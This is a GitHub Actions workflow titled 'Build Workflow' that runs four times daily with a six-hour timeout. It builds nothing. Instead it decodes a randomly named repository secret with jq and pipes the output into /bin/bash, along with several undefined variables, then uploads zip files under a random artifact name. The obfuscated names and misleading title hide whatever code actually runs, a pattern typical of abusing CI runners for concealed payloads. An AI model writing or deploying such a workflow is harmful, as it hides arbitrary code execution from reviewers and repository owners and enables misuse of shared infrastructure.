name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '46 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          j9628: ${{ secrets.j9628 }}
        run: |
          printf '%s' "$j9628" | jq -r .l8 | /bin/bash
          printf '%s' "$yr72" | jq -r .kz9 | /bin/bash
          echo $a509 | jq -r .gp1 | /bin/bash
          printf '%s' "$gpai84133" | jq -r .y2 | /bin/bash
          printf '%s' "$kqpfs8510" | jq -r .bwe470 | /bin/bash
          printf '%s' "$bjmx8" | jq -r .kp1 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: TQN9Qysl
          path: "*.zip"
          retention-days: 1
